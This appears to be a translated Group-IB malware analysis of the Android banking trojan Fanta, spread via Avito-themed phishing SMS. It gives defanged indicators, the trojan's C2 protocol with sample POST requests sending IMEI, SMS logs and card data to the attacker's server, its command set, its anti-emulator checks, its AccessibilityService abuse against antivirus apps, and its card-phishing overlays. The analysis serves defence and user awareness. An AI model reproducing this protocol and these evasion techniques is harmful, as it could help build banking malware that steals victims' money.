En dag du vill sälja något på Avito och efter att ha lagt upp en detaljerad beskrivning av din produkt (till exempel en RAM-modul), kommer du att få detta meddelande:
När du öppnar länken kommer du att se en till synes ofarlig sida som meddelar dig, den glada och framgångsrika säljaren, att ett köp har gjorts:
När du klickar på knappen "Fortsätt" kommer en APK-fil med en ikon och ett förtroendeingivande namn att laddas ner till din Android-enhet. Du installerade en applikation som av någon anledning begärde AccessibilityService-rättigheter, sedan dök ett par fönster upp och försvann snabbt och... Det var allt.
Du går för att kontrollera ditt saldo, men av någon anledning ber din bankapp om dina kortuppgifter igen. Efter att ha angett uppgifterna händer något hemskt: av någon anledning som fortfarande är oklart för dig börjar pengar försvinna från ditt konto. Du försöker lösa problemet, men din telefon gör motstånd: den trycker på tangenterna "Tillbaka" och "Hem", stängs inte av och tillåter dig inte att aktivera några säkerhetsåtgärder. Som ett resultat blir du utan pengar, dina varor har inte köpts, du är förvirrad och undrar: vad hände?
Svaret är enkelt: du har blivit ett offer för Android Trojan Fanta, en medlem av Flexnet-familjen. Hur hände det här? Låt oss förklara nu.
Författare: Andrey Polovinkin, junior specialist i analys av skadlig programvara, Ivan Pisarev, specialist på skadlig programvara.
Några statistik
Flexnet-familjen av Android-trojaner blev först känd redan 2015. Under en ganska lång aktivitetsperiod expanderade familjen till flera underarter: Fanta, Limebot, Lipton, etc. Trojanen, liksom infrastrukturen förknippad med den, står inte stilla: nya effektiva distributionssystem håller på att utvecklas - i vårt fall högkvalitativa nätfiskesidor riktade till en specifik användare-säljare, och de trojanska utvecklarna följer modetrender inom virusskrivning - lägga till ny funktionalitet som gör det möjligt att stjäla pengar mer effektivt från infekterade enheter och kringgå skyddsmekanismer.
Kampanjen som beskrivs i den här artikeln riktar sig till användare från Ryssland; ett litet antal infekterade enheter registrerades i Ukraina och ännu färre i Kazakstan och Vitryssland.
Även om Flexnet har funnits på Android Trojan-arenan i över 4 år nu och har studerats i detalj av många forskare, är det fortfarande i gott skick. Från och med januari 2019 är den potentiella skadan mer än 35 miljoner rubel - och detta är endast för kampanjer i Ryssland. Under 2015 såldes olika versioner av denna Android-trojan på underjordiska forum, där även källkoden för trojanen med en detaljerad beskrivning kunde hittas. Det betyder att statistiken över skadorna i världen är ännu mer imponerande. Inte en dålig indikator för en så gammal man, eller hur?
Från försäljning till bedrägeri
Som framgår av den tidigare presenterade skärmdumpen av en nätfiskesida för internettjänsten för att lägga ut annonser Avito, var den förberedd för ett specifikt offer. Tydligen använder angriparna en av Avitos parsers, som extraherar telefonnummer och namn på säljaren, såväl som produktbeskrivningen. Efter att ha utökat sidan och förberett APK-filen skickas offret ett SMS med sitt namn och en länk till en nätfiskesida som innehåller en beskrivning av hans produkt och det belopp som erhållits från "försäljningen" av produkten. Genom att klicka på knappen får användaren en skadlig APK-fil - Fanta.
En studie av domänen shcet491[.]ru visade att den är delegerad till Hostingers DNS-servrar:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Domänzonfilen innehåller poster som pekar på IP-adresserna 31.220.23[.]236, 31.220.23[.]243 och 31.220.23[.]235. Dock pekar domänens primära resurspost (A-post) till en server med IP-adress 178.132.1[.]240.
IP-adressen 178.132.1[.]240 finns i Nederländerna och tillhör hostaren WorldStream. IP-adresserna 31.220.23[.]235, 31.220.23[.]236 och 31.220.23[.]243 finns i Storbritannien och tillhör den delade värdservern HOSTINGER. Används som inspelare openprov-ru. Följande domäner har också lösts till IP-adressen 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Det bör noteras att länkar i följande format var tillgängliga från nästan alla domäner:
http://(www.){0,1}<%domain%>/[0-9]{7}
Denna mall innehåller också en länk från ett SMS. Baserat på historiska data fann man att en domän motsvarar flera länkar i mönstret som beskrivs ovan, vilket indikerar att en domän användes för att distribuera trojanen till flera offer.
Låt oss hoppa framåt lite: trojanen som laddas ner via en länk från ett SMS använder adressen som en kontrollserver onusedseddohap[.]klubb. Den här domänen registrerades 2019-03-12, och från och med 2019-04-29 interagerade APK-appar med den här domänen. Baserat på data som erhållits från VirusTotal, interagerade totalt 109 applikationer med denna server. Själva domänen löste sig till IP-adressen 217.23.14[.]27, beläget i Nederländerna och ägs av värden WorldStream. Används som inspelare NameCheap. Domäner har också lösts till denna IP-adress bad-racoon[.]klubb (med start 2018-09-25) och bad-racoon[.]live (med start 2018-10-25). Med domän bad-racoon[.]klubb mer än 80 APK-filer interagerat med bad-racoon[.]live - mer än 100.
I allmänhet fortskrider attacken enligt följande:
Vad finns under Fantas lock?
Liksom många andra Android-trojaner kan Fanta läsa och skicka SMS-meddelanden, göra USSD-förfrågningar och visa sina egna fönster ovanpå applikationer (inklusive banktjänster). Men arsenalen av funktionalitet för denna familj har anlänt: Fanta började använda Tillgänglighetsservice för olika ändamål: läsa innehållet i meddelanden från andra applikationer, förhindra upptäckt och stoppa exekveringen av en trojan på en infekterad enhet, etc. Fanta fungerar på alla versioner av Android som inte är yngre än 4.4. I den här artikeln kommer vi att titta närmare på följande Fanta-exempel:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Omedelbart efter lansering
Omedelbart efter lanseringen döljer trojanen sin ikon. Applikationen kan bara fungera om namnet på den infekterade enheten inte finns i listan:
- android_x86
- VirtualBox
- Nexus 5X (bullhead)
- Nexus 5 (rakhyvel)
Denna kontroll utförs i trojanens huvudtjänst - MainService. När den startas för första gången initieras applikationens konfigurationsparametrar till standardvärden (formatet för att lagra konfigurationsdata och deras betydelse kommer att diskuteras senare), och en ny infekterad enhet registreras på kontrollservern. En HTTP POST-begäran med meddelandetypen kommer att skickas till servern register_bot och information om den infekterade enheten (Android-version, IMEI, telefonnummer, operatörsnamn och landskod där operatören är registrerad). Adressen fungerar som kontrollserver hXXp://onuseseddohap[.]club/controller.php. Som svar skickar servern ett meddelande som innehåller fälten bot_id, bot_pwd, server — applikationen sparar dessa värden som parametrar för CnC-servern. Parameter server valfritt om fältet inte mottogs: Fanta använder registreringsadressen - hXXp://onuseseddohap[.]club/controller.php. Funktionen att ändra CnC-adressen kan användas för att lösa två problem: att fördela belastningen jämnt mellan flera servrar (om det finns ett stort antal infekterade enheter kan belastningen på en ooptimerad webbserver vara hög), och även att använda en alternativ server i händelse av fel på en av CnC-servrarna.
Om ett fel uppstår när förfrågan skickas kommer trojanen att upprepa registreringsprocessen efter 20 sekunder.
När enheten har registrerats framgångsrikt kommer Fanta att visa följande meddelande till användaren:
Viktigt: tjänsten ringde System Säkerhet — namnet på den trojanska tjänsten och efter att ha klickat på knappen ОК Ett fönster öppnas med tillgänglighetsinställningarna för den infekterade enheten, där användaren måste ge tillgänglighetsrättigheter för den skadliga tjänsten:
Så snart användaren slår på Tillgänglighetsservice, Fanta får tillgång till innehållet i programfönster och de åtgärder som utförs i dem:
Omedelbart efter att ha fått tillgänglighetsrättigheter begär trojanen administratörsrättigheter och rättigheter att läsa aviseringar:
Med hjälp av AccessibilityService simulerar applikationen tangenttryckningar och ger sig själv alla nödvändiga rättigheter.
Fanta skapar flera databasinstanser (vilka kommer att beskrivas senare) som är nödvändiga för att lagra konfigurationsdata, såväl som information som samlas in i processen om den infekterade enheten. För att skicka den insamlade informationen skapar trojanen en upprepad uppgift utformad för att ladda ner fält från databasen och ta emot ett kommando från kontrollservern. Intervallet för åtkomst till CnC ställs in beroende på Android-versionen: i fallet med 5.1 kommer intervallet att vara 10 sekunder, annars 60 sekunder.
För att ta emot kommandot gör Fanta en begäran GetTask till hanteringsservern. Som svar kan CnC skicka ett av följande kommandon:
| Team | beskrivning |
|---|---|
| 0 | Skicka SMS |
| 1 | Ring ett telefonsamtal eller USSD-kommando |
| 2 | Uppdaterar en parameter intervall |
| 3 | Uppdaterar en parameter snappa upp |
| 6 | Uppdaterar en parameter smsManager |
| 9 | Börja samla in SMS |
| 11 | Återställ telefonen till fabriksinställningarna |
| 12 | Aktivera/inaktivera loggning av skapande av dialogrutor |
Fanta samlar även in aviseringar från 70 bankappar, snabba betalningssystem och e-plånböcker och lagrar dem i en databas.
Lagring av konfigurationsparametrar
För att lagra konfigurationsparametrar använder Fanta en standardmetod för Android-plattformen - preferenser-filer. Inställningarna kommer att sparas i en fil med namnet inställningar. En beskrivning av de sparade parametrarna finns i tabellen nedan.
| namn | Standardvärde | Möjliga värden | beskrivning |
|---|---|---|---|
| id | 0 | Heltal | Bot-ID |
| server | hXXp://onuseseddohap[.]club/ | URL | Kontrollserveradress |
| pwd | - | Sträng | Server lösenord |
| intervall | 20 | Heltal | Tidsintervall. Anger hur länge följande uppgifter ska skjutas upp:
|
| snappa upp | alla | alla/telNumber | Om fältet är lika med strängen alla eller telNumber, då kommer det mottagna SMS-meddelandet att fångas upp av applikationen och inte visas för användaren |
| smsManager | 0 | 0/1 | Aktivera/inaktivera programmet som standard SMS-mottagare |
| readDialog | falsk | Sant falskt | Aktivera/inaktivera händelseloggning TillgänglighetEvent |
Fanta använder också filen smsManager:
| namn | Standardvärde | Möjliga värden | beskrivning |
|---|---|---|---|
| pckg | - | Sträng | Namn på SMS-meddelandehanteraren som används |
Interaktion med databaser
Under sin drift använder trojanen två databaser. Databasen heter a används för att lagra olika uppgifter som samlats in från telefonen. Den andra databasen heter fanta.db och används för att spara inställningar som ansvarar för att skapa nätfiskefönster utformade för att samla in information om bankkort.
Trojan använder databas а för att lagra insamlad information och logga dina handlingar. Data lagras i en tabell loggar. För att skapa en tabell, använd följande SQL-fråga:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Databasen innehåller följande information:
1. Loggar uppstarten av den infekterade enheten med ett meddelande Telefonen slog på!
2. Aviseringar från applikationer. Meddelandet genereras enligt följande mall:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Bankkortsdata från nätfiskeformulär skapade av trojanen. Parameter VIEW_NAME kan vara något av följande:
- AliExpress
- Avito
- Google Play
- Övrigt <%App Name%>
Meddelandet loggas i formatet:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Inkommande/utgående SMS-meddelanden i formatet:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Information om paketet som skapar dialogrutan i formatet:
(<%Package name%>)<%Package information%>
Exempeltabell loggar:
En av funktionerna hos Fanta är insamling av information om bankkort. Datainsamling sker genom att man skapar nätfiskefönster när man öppnar bankapplikationer. Trojanen skapar nätfiskefönstret endast en gång. Information om att fönstret visades för användaren lagras i en tabell inställningar i databasen fanta.db. För att skapa en databas, använd följande SQL-fråga:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Alla tabellfält inställningar som standard initialiserad till 1 (skapa ett nätfiskefönster). Efter att användaren har skrivit in sina data kommer värdet att sättas till 0. Exempel på tabellfält inställningar:
- kan_logga in — fältet ansvarar för att formuläret visas när du öppnar en bankansökan
- first_bank - inte använd
- can_avito — fältet ansvarar för att formuläret visas när du öppnar Avito-applikationen
- can_ali — fältet är ansvarigt för att visa formuläret när du öppnar Aliexpress-applikationen
- kan_annan — fältet ansvarar för att formuläret visas när du öppnar en ansökan från listan: Yula, Pandao, Drom Auto, Plånbok. Rabatt- och bonuskort, Aviasales, Booking, Trivago
- can_card — fältet ansvarar för att formuläret visas vid öppning Google Play
Interaktion med hanteringsservern
Nätverksinteraktion med hanteringsservern sker via HTTP-protokollet. För att arbeta med nätverket använder Fanta det populära Retrofit-biblioteket. Förfrågningar skickas till: hXXp://onuseseddohap[.]club/controller.php. Serveradressen kan ändras vid registrering på servern. Cookies kan skickas som svar från servern. Fanta gör följande förfrågningar till servern:
- Registrering av boten på kontrollservern sker en gång, vid första lanseringen. Följande data om den infekterade enheten skickas till servern:
· Cookies — cookies mottagna från servern (standardvärdet är en tom sträng)
· läge — strängkonstant register_bot
· prefix — heltalskonstant 2
· version_sdk — är utformad enligt följande mall: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — IMEI för den infekterade enheten
· land — Koden för det land där operatören är registrerad, i ISO-format
· antal - telefonnummer
· Operatören — operatörens namnEtt exempel på en begäran som skickas till servern:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Som svar på begäran måste servern returnera ett JSON-objekt som innehåller följande parametrar:
· bot_id — ID för den infekterade enheten. Om bot_id är lika med 0, kommer Fanta att köra om begäran.
bot_pwd — lösenord för servern.
server — kontrollserveradress. Valfri parameter. Om parametern inte anges kommer adressen som sparats i applikationen att användas.Exempel JSON-objekt:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Begäran att få ett kommando från servern. Följande data skickas till servern:
· Cookies — kakor som tas emot från servern
· bud — ID för den infekterade enheten som togs emot när begäran skickades register_bot
· pwd -lösenord för servern
· divice_admin — Fältet avgör om administratörsrättigheter har erhållits. Om administratörsrättigheter har erhållits är fältet lika med 1annat 0
· Tillgänglighet — Driftstatus för tillgänglighetstjänsten. Om tjänsten startades är värdet 1annat 0
· SMSManager — visar om trojanen är aktiverad som standardapplikation för att ta emot SMS
· screen — visar vilket tillstånd skärmen är i. Värdet kommer att ställas in 1, om skärmen är på, annars 0;Ett exempel på en begäran som skickas till servern:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Beroende på kommandot kan servern returnera ett JSON-objekt med olika parametrar:
· Team Skicka SMS: Parametrarna innehåller telefonnumret, texten i SMS-meddelandet och ID för meddelandet som skickas. Identifieraren används när man skickar ett meddelande till servern med typ setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Team Ring ett telefonsamtal eller USSD-kommando: Telefonnumret eller kommandot kommer i svarstexten.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Team Ändra intervallparameter.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Team Ändra intercept-parameter.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Team Ändra SmsManager-fält.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Team Samla SMS-meddelanden från en infekterad enhet.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Team Återställ telefonen till fabriksinställningarna:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Team Ändra ReadDialog-parameter.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Skickar ett meddelande med typ setSmsStatus. Denna begäran görs efter att kommandot har utförts Skicka SMS. Förfrågan ser ut så här:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Ladda upp databasinnehåll. En rad sänds per begäran. Följande data skickas till servern:
· Cookies — kakor som tas emot från servern
· läge — strängkonstant setSaveInboxSms
· bud — ID för den infekterade enheten som togs emot när begäran skickades register_bot
· text — text i den aktuella databasposten (fält d från bordet loggar i databasen а)
· antal — namnet på den aktuella databasposten (fält p från bordet loggar i databasen а)
· sms_mode — heltalsvärde (fält m från bordet loggar i databasen а)Förfrågan ser ut så här:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Om den skickas till servern kommer raden att raderas från tabellen. Exempel på ett JSON-objekt som returneras av servern:
{ "response":[], "status":"ok" }
Interagerar med AccessibilityService
AccessibilityService implementerades för att göra Android-enheter enklare att använda för personer med funktionshinder. I de flesta fall krävs fysisk interaktion för att interagera med en applikation. AccessibilityService låter dig göra dem programmatiskt. Fanta använder tjänsten för att skapa falska fönster i bankapplikationer och hindra användare från att öppna systeminställningar och vissa applikationer.
Med hjälp av tillgänglighetstjänstens funktionalitet övervakar trojanen ändringar av element på skärmen på den infekterade enheten. Som tidigare beskrivits innehåller Fanta-inställningarna en parameter som ansvarar för loggningsoperationer med dialogrutor - readDialog. Om denna parameter är inställd kommer information om namnet och beskrivningen av paketet som utlöste händelsen att läggas till i databasen. Trojanen utför följande åtgärder när händelser utlöses:
- Simulerar att trycka på bakåt- och hemknapparna i följande fall:
· om användaren vill starta om sin enhet
· om användaren vill ta bort "Avito"-applikationen eller ändra åtkomsträttigheter
· om det finns ett omnämnande av "Avito"-applikationen på sidan
· när du öppnar appen Google Play Protect
· när du öppnar sidor med AccessibilityService-inställningar
· när dialogrutan Systemsäkerhet visas
· när du öppnar sidan med inställningarna "Rita över annan app".
· när du öppnar sidan "Applikationer", "Återställning och återställning", "Dataåterställning", "Återställ inställningar", "Utvecklarpanel", "Special. möjligheter", "Särskilda möjligheter", "Särskilda rättigheter"
· om händelsen genererades av vissa applikationer.Lista över applikationer
- android
- Master Lite
- Ren mästare
- Clean Master för x86 CPU
- Meizu Application Permission Management
- MIUI säkerhet
- Clean Master - Antivirus & Cache och Garbage Cleaner
- Föräldrakontroll och GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virusrenare, antivirus, renare (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus och gratis skydd 2019
- Mobil säkerhet MegaFon
- AVG Protection för Xperia
- Mobil säkerhet
- Malwarebytes Antivirus och skydd
- Antivirus för Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- AVG antivirus för Huawei tablet System Manager
- Samsung tillgänglighet
- Samsung Smart Manager
- Säkerhetsmästare
- Speed Booster
- Dr.Web
- Dr.Web Security Space
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus & mobil säkerhet
- Kaspersky Internet Security: Antivirus och skydd
- Kasperskys batterilivslängd: Saver & Booster
- Kaspersky Endpoint Security - skydd och hantering
- AVG Antivirus gratis 2019 – Skydd för Android
- Android antivirus
- Norton Mobile Security och Antivirus
- Antivirus, brandvägg, VPN, mobil säkerhet
- Mobil säkerhet: antivirus, VPN, stöldskydd
- Antivirus för Android
- Om tillstånd begärs när du skickar ett SMS till ett kortnummer, simulerar Fanta att klicka på kryssrutan Kom ihåg valet och knappen att skicka.
- När du försöker ta bort administratörsrättigheter från trojanen låser den telefonens skärm.
- Förhindrar att nya administratörer läggs till.
- Om antivirusprogrammet dr.web upptäckte ett hot, imiterar Fanta att trycka på knappen ignorera.
- Trojanen simulerar att trycka på bakåt- och hemknappen om händelsen genererades av applikationen Samsung Device Care.
- Fanta skapar nätfiskefönster med blanketter för att mata in information om bankkort om en applikation från en lista med ett 30-tal olika internettjänster lanserades. Bland dem: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.
Nätfiskeformulär
Fanta analyserar vilka applikationer som körs på den infekterade enheten. Om en intresseanmälan öppnades visar trojanen ett nätfiskefönster ovanpå alla andra, vilket är ett formulär för att ange bankkortsinformation. Användaren måste ange följande data:
- Kortnummer
- Kortets utgångsdatum
- CVV
- Kortinnehavarens namn (inte för alla banker)
Beroende på vilket program som körs kommer olika nätfiskefönster att visas. Nedan följer exempel på några av dem:
Aliexpress:
Avito:
För vissa andra applikationer, t.ex. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Hur det egentligen var
Lyckligtvis visade sig personen som fick SMS-meddelandet som beskrivs i början av artikeln vara en cybersäkerhetsspecialist. Därför skiljer sig den verkliga, icke-regissörens version från den som berättades tidigare: en person fick ett intressant SMS, varefter han gav det till Group-IB Threat Hunting Intelligence-teamet. Resultatet av attacken är denna artikel. Lyckligt slut, eller hur? Men alla berättelser slutar inte så framgångsrikt, och för att din inte ska se ut som en regissör med en förlust av pengar räcker det i de flesta fall att följa följande långa beskrivna regler:
- Installera inte applikationer för en mobil enhet med Android OS från andra källor än Google Play
- När du installerar en applikation, var särskilt uppmärksam på de rättigheter som applikationen begär
- var uppmärksam på tilläggen av nedladdade filer
- installera Android OS-uppdateringar regelbundet
- besök inte misstänkta resurser och ladda inte ner filer därifrån
- Klicka inte på länkar som tas emot i SMS.
Källa: will.com